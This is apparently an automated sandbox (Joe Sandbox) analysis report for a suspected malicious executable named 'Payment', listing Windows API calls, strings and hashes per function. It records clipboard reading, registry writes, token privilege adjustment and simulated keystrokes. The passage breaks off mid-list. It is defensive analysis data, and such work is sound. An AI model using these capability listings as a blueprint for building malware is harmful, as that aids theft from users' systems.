                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 84806c6a40c23b8d72e9df05ae35ff30ba85b8c4551e67c824ebe954e50366ec
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 6FB0927684020C77DE012E92EC02A693F1A9B40679F808020FB0C18162A673E6A09689
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 00B3D46A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: 3151fe54de8c74edecf8f4c9f8e238085a3c8090386b1ebb23aa5e412cb648aa
                                                          • Instruction ID: 628fee82e97d567e04871d6dae31278d35ccdd725c571133156884b7ca7886f1
                                                          • Opcode Fuzzy Hash: 3151fe54de8c74edecf8f4c9f8e238085a3c8090386b1ebb23aa5e412cb648aa
                                                          • Instruction Fuzzy Hash: A4714E306047029FC714EF28D591A6AB7E0EF88354F14496DF5969B3A2DB30ED49CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 4b27b74814f904a11069f01267fcaf5a94aa1a24f5dced795146da0f7863041d
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 5631B371A00109DFC718DF98D480969F7B6FF59301B648AA5F50ACB652D731EDC1CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 02142311
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2157017253.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2140000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: a8886c2ebadb57f23a70453c9d924091a711d741c74c26b8a8f111e00c1b4089
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 25E0BF7498010D9FDB00EFB4D54969E7BB4EF04701F100561FD0592280DB3099508A62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B5CE50
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5CE91
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B5CED6
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B5CF00
                                                          • SendMessageW.USER32 ref: 00B5CF29
                                                          • _wcsncpy.LIBCMT ref: 00B5CFA1
                                                          • GetKeyState.USER32(00000011), ref: 00B5CFC2
                                                          • GetKeyState.USER32(00000009), ref: 00B5CFCF
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B5CFE5
                                                          • GetKeyState.USER32(00000010), ref: 00B5CFEF
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B5D018
                                                          • SendMessageW.USER32 ref: 00B5D03F
                                                          • SendMessageW.USER32(?,00001030,?,00B5B602), ref: 00B5D145
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B5D15B
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B5D16E
                                                          • SetCapture.USER32(?), ref: 00B5D177
                                                          • ClientToScreen.USER32(?,?), ref: 00B5D1DC
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B5D1E9
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B5D203
                                                          • ReleaseCapture.USER32 ref: 00B5D20E
                                                          • GetCursorPos.USER32(?), ref: 00B5D248
                                                          • ScreenToClient.USER32(?,?), ref: 00B5D255
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B5D2B1
                                                          • SendMessageW.USER32 ref: 00B5D2DF
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B5D31C
                                                          • SendMessageW.USER32 ref: 00B5D34B
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B5D36C
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B5D37B
                                                          • GetCursorPos.USER32(?), ref: 00B5D39B
                                                          • ScreenToClient.USER32(?,?), ref: 00B5D3A8
                                                          • GetParent.USER32(?), ref: 00B5D3C8
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B5D431
                                                          • SendMessageW.USER32 ref: 00B5D462
                                                          • ClientToScreen.USER32(?,?), ref: 00B5D4C0
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B5D4F0
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B5D51A
                                                          • SendMessageW.USER32 ref: 00B5D53D
                                                          • ClientToScreen.USER32(?,?), ref: 00B5D58F
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B5D5C3
                                                            • Part of subcall function 00AD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AD25EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B5D65F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: 22b5cfa82035eeda91dfed102fbc64f5423a4eb8cbb1c275908a88305df3ee34
                                                          • Instruction ID: 23f72a2780928459641dfb083969e0e24bc451ef829c79bc096158af61296c8d
                                                          • Opcode Fuzzy Hash: 22b5cfa82035eeda91dfed102fbc64f5423a4eb8cbb1c275908a88305df3ee34
                                                          • Instruction Fuzzy Hash: 55429070104341AFDB25DF28C884FAABFE6FF48355F1406D9FA55872A0DB31A849CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B5873F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 3850602802-328681919
                                                          • Opcode ID: f2121959ed3dbc2de6080cef12b98735a4aacb2bf47a53f077134476b9bae121
                                                          • Instruction ID: 445999fd7de42967f9d83f962160628ec10c364b7bbf7363ef3722707e7cd5d1
                                                          • Opcode Fuzzy Hash: f2121959ed3dbc2de6080cef12b98735a4aacb2bf47a53f077134476b9bae121
                                                          • Instruction Fuzzy Hash: D612B071500209ABEB259F64DC89FAB7BF8EF49712F2041E9F915EB2A1DF708945CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                          • API String ID: 1357608183-1798697756
                                                          • Opcode ID: d7e4434801f77a749ac824b609c06dedf3ab7d66cb4e86b6ed03a1457a0583f1
                                                          • Instruction ID: 4bd4383dc1efd8e25569f8aaeb561c26ba69fcbc319a4d2a83fb61b15836f2f1
                                                          • Opcode Fuzzy Hash: d7e4434801f77a749ac824b609c06dedf3ab7d66cb4e86b6ed03a1457a0583f1
                                                          • Instruction Fuzzy Hash: 3493A371A00225DFDB24CF58D881BADB7F1FF48710F2585AAE959EB280E7749E81CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00AD4A3D
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B0DA8E
                                                          • IsIconic.USER32(?), ref: 00B0DA97
                                                          • ShowWindow.USER32(?,00000009), ref: 00B0DAA4
                                                          • SetForegroundWindow.USER32(?), ref: 00B0DAAE
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0DAC4
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B0DACB
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B0DAD7
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0DAE8
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B0DAF0
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B0DAF8
                                                          • SetForegroundWindow.USER32(?), ref: 00B0DAFB
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0DB10
                                                          • keybd_event.USER32(00000012,00000000), ref: 00B0DB1B
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0DB25
                                                          • keybd_event.USER32(00000012,00000000), ref: 00B0DB2A
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0DB33
                                                          • keybd_event.USER32(00000012,00000000), ref: 00B0DB38
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0DB42
                                                          • keybd_event.USER32(00000012,00000000), ref: 00B0DB47
                                                          • SetForegroundWindow.USER32(?), ref: 00B0DB4A
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00B0DB71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: ab53d2158b40b096996ba3847057b5a1d3d55d5af850a8f18c4777bcb356ce17
                                                          • Instruction ID: fce85767bb74253fe2314ff7cd4f5ca5776f97770e2d16c2b36f9194daf7942f
                                                          • Opcode Fuzzy Hash: ab53d2158b40b096996ba3847057b5a1d3d55d5af850a8f18c4777bcb356ce17
                                                          • Instruction Fuzzy Hash: 9F315371A40319BFEB216FA19C49F7F7EACEB44B51F1140A5FA05E71D0DAB05D01EAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B28D0D
                                                            • Part of subcall function 00B28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B28D3A
                                                            • Part of subcall function 00B28CC3: GetLastError.KERNEL32 ref: 00B28D47
                                                          • _memset.LIBCMT ref: 00B2889B
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B288ED
                                                          • CloseHandle.KERNEL32(?), ref: 00B288FE
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B28915
                                                          • GetProcessWindowStation.USER32 ref: 00B2892E
                                                          • SetProcessWindowStation.USER32(00000000), ref: 00B28938
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B28952
                                                            • Part of subcall function 00B28713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B28851), ref: 00B28728
                                                            • Part of subcall function 00B28713: CloseHandle.KERNEL32(?,?,00B28851), ref: 00B2873A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: bb73de6404f622742b60877963c18556913d06e4da496101c807433c532cd5ac
                                                          • Instruction ID: e5e0d34e34c4e76f4d2691579894b0e0dfd206de4b89d3d9380d7ee170a89b16
                                                          • Opcode Fuzzy Hash: bb73de6404f622742b60877963c18556913d06e4da496101c807433c532cd5ac
                                                          • Instruction Fuzzy Hash: C8814971902219AFDF11DFA4EC45AFEBBB8EF05305F0845AAF918A6161DF318E14DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenClipboard.USER32(00B5F910), ref: 00B44284
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B44292
                                                          • GetClipboardData.USER32(0000000D), ref: 00B4429A
                                                          • CloseClipboard.USER32 ref: 00B442A6
                                                          • GlobalLock.KERNEL32(00000000), ref: 00B442C2
                                                          • CloseClipboard.USER32 ref: 00B442CC
                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B442E1
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00B442EE
                                                          • GetClipboardData.USER32(00000001), ref: 00B442F6
                                                          • GlobalLock.KERNEL32(00000000), ref: 00B44303
                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00B44337
                                                          • CloseClipboard.USER32 ref: 00B44447
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: ebecd77926b6a2e327a324dfa1d85699cff24d458161f9a746bf44aafc343255
                                                          • Instruction ID: 2ea87dafe17072e582b1eb0533d9081260210ae9a36a932a2c48cd5a9ad1c7e0
                                                          • Opcode Fuzzy Hash: ebecd77926b6a2e327a324dfa1d85699cff24d458161f9a746bf44aafc343255
                                                          • Instruction Fuzzy Hash: AD516A71204302ABD311AF60ED96F7FB7E8EF84B01F1045AAB556D32A1DF70DA059A62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B3C9F8
                                                          • FindClose.KERNEL32(00000000), ref: 00B3CA4C
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B3CA71
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B3CA88
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B3CAAF
                                                          • __swprintf.LIBCMT ref: 00B3CAFB
                                                          • __swprintf.LIBCMT ref: 00B3CB3E
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                          • __swprintf.LIBCMT ref: 00B3CB92
                                                            • Part of subcall function 00AF38D8: __woutput_l.LIBCMT ref: 00AF3931
                                                          • __swprintf.LIBCMT ref: 00B3CBE0
                                                            • Part of subcall function 00AF38D8: __flsbuf.LIBCMT ref: 00AF3953
                                                            • Part of subcall function 00AF38D8: __flsbuf.LIBCMT ref: 00AF396B
                                                          • __swprintf.LIBCMT ref: 00B3CC2F
                                                          • __swprintf.LIBCMT ref: 00B3CC7E
                                                          • __swprintf.LIBCMT ref: 00B3CCCD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 56189bd8783bd94b9bfadd9eb0b712c38b30d138452c6411cb3dbe132a33f520
                                                          • Instruction ID: 110cad2c2982f933512c2f44152771fac81486f6bfbb3f9ae7a31922fa09f063
                                                          • Opcode Fuzzy Hash: 56189bd8783bd94b9bfadd9eb0b712c38b30d138452c6411cb3dbe132a33f520
                                                          • Instruction Fuzzy Hash: 9DA141B2408315ABC710EBA4C985EAFB7ECFF94704F40495EB586D7291EB34DA08C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B3F221
                                                          • _wcscmp.LIBCMT ref: 00B3F236
                                                          • _wcscmp.LIBCMT ref: 00B3F24D
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00B3F25F
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00B3F279
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B3F291
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F29C
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B3F2B8
                                                          • _wcscmp.LIBCMT ref: 00B3F2DF
                                                          • _wcscmp.LIBCMT ref: 00B3F2F6
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B3F308
                                                          • SetCurrentDirectoryW.KERNEL32(00B8A5A0), ref: 00B3F326
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B3F330
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F33D
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F34F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: dd337bb9c52181b03f659e71631fb2c050ded5ec99f0a00dc3999678bc2312c7
                                                          • Instruction ID: d94c1ace5afc996057d50a536fb2208c7f18eb57fc92a875cd9f35eaf8ccdf88
                                                          • Opcode Fuzzy Hash: dd337bb9c52181b03f659e71631fb2c050ded5ec99f0a00dc3999678bc2312c7
                                                          • Instruction Fuzzy Hash: 5831A47690021AAADB10EBB4DC49AFEB3ECDF08361F2441F6F914D30A0EB74DA45CA54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B50BDE
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B5F910,00000000,?,00000000,?,?), ref: 00B50C4C
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B50C94
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B50D1D
                                                          • RegCloseKey.ADVAPI32(?), ref: 00B5103D
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00B5104A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 3e4a7bf80fccad495075343d38309baadd368aca6bc31c125c9c66a1b5e28b77
                                                          • Instruction ID: a23ab64b457454f58b3c07870eeaf2ea3ecd35c7e51b736e5e6e7c26b16b9f92
                                                          • Opcode Fuzzy Hash: 3e4a7bf80fccad495075343d38309baadd368aca6bc31c125c9c66a1b5e28b77
                                                          • Instruction Fuzzy Hash: E0023A752006519FCB14EF24C995E2AB7E5FF89714F04889DF88A9B3A2CB30ED45CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B3F37E
                                                          • _wcscmp.LIBCMT ref: 00B3F393
                                                          • _wcscmp.LIBCMT ref: 00B3F3AA
                                                            • Part of subcall function 00B345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B345DC
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B3F3D9
                                                          • FindClose.KERNEL32(00000000), ref: 00B3F3E4
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B3F400
                                                          • _wcscmp.LIBCMT ref: 00B3F427
                                                          • _wcscmp.LIBCMT ref: 00B3F43E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B3F450
